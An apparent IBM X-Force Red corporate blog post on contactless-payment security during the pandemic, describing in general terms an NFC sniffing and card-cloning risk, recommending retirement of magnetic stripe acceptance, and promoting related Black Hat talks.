Contactless payments: Less contact may mean less security
By Abby Ross, Associate Partner, X-Force Red
When the pandemic hit, the use of contactless payments soared, jumping from 28 percent to 46 percent, according to a recent report. The increase isn't surprising considering a contactless environment fosters social distancing and no shared pin pads, two cornerstones of pandemic living. Not to mention the ease-of-use factor. I never enjoy standing at the grocery line checkout with my two young children begging for candy bars while I frantically dig through my wallet in search of my credit card as a line of shoppers gather behind me, wondering why I am taking so long. The technology has been a blessing for many consumers. From a cybersecurity perspective, however, it can be a curse.
Consumers were no stranger to contactless payments prior to the pandemic. Merchants encouraged their use, albeit with limits. Originally, in some countries, shoppers would be required to use chip and pin after a certain number of contactless payment transactions. For example, in the United Kingdom, consumers had to perform one chip and pin transaction for every five contactless payments. The restriction reduced the number of opportunities for fraudulent transactions. Then the pandemic hit. Consumers avoided touching pin pads and longed to social distance, which made the importance of contactless payments skyrocket. The technology became so popular that many retailers and payments providers removed the transaction limitations. Wanting a piece of the pie, vendors, who were not traditional banks and lacked experience in the payments space, created their own payment machines, cards and processes for contactless payments.
Because contactless payments evolved from chip and pin technology, merchants and consumers alike assumed security evolved with it. Unfortunately, that wasn't always the case, especially with inexperienced vendors in the mix. When NFC technology came along, which powers contactless communications, new CVV codes were needed on the “smart” payment cards to authenticate transactions. While NFC is known to be a more secure technology, if the CVV codes weren't implemented correctly on the backend, attackers could bypass the authentication processes.
Our X-Force Red lead hardware hacker Adam Laurie researched the technology to see for himself. He discovered that he could “sniff” an NFC conversation between a contactless payments card and reader, meaning he could see the communications (and data) going back and forth between two technologies. If he were an attacker, he could then convert the “smart” payment card into a magnetic stripe card and use it to make fraudulent purchases.
The rapid demand for contactless payment systems has led to sloppy implementations with security holes. Adam says that magnetic stripe technology is also less secure than NFC. If retailers stopped accepting magnetic stripe technology as a reasonable mode of payment, it could decrease the opportunity for sniffing and other types of attacks.
If you think Adam's sniffing attack sounds complicated, we welcome you to watch his virtual Black Hat presentation titled, Contactless payments: One sniff and attackers are in.
Another virtual session that may be of interest is X-Force IR Executive Consultant & Global Remediation Lead Andrew Gorecki's presentation A Race to Diminish: Beating the Adversaries Once they are In.
If you are attending the show, stop by IBM Security's booth #1647 to learn more about X-Force's offensive and defensive security services.